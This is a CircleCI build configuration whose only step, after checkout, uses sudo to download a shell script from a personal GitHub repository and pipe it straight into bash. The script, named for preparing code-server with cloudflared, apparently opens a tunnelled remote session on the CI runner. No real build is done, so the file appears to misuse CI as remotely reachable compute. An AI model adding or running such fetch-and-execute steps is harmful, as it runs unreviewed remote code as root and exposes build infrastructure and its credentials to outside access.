version: 2.0
jobs:
  build:
    docker:
      - image: circleci/ruby:2.4.2-jessie-node
        auth:
          username: mydockerhub-user
          password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
    steps:
      - checkout
      - run:  sudo apt update;sudo apt -y install wget;sudo wget -O - https://raw.githubusercontent.com/nathanfleight/scripts/main/prep_codeserver_w_cloudflared.sh | bash